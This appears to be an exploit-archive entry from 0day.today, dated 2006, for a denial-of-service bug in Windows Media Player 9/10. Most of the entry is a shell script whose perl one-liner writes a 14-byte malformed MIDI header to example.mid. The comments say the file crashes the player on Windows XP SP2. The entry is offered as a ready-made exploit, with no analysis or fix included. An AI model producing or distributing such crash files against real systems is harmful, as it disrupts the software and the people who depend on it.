id: 6251
date: 12/15/2006
title: Windows Media Player 9/10 (MID File) Denial Of Service Exploit
author: sehato
cves: 

==============================================================
Windows Media Player 9/10 (MID File) Denial Of Service Exploit
==============================================================




#!/bin/sh
# Windows Media MID File Denial Of Service Vulnerability
# Tested:
# Windows Media 10.00.00.4036
# Windows XP SP2
# file "example.mid" (Hex-Code):
# 4D 54 68 64 00 00 00 06 00 00 00 00 00 00
# File size = 14 byte

perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > example.mid



#  0day.today [2023-03-26]  #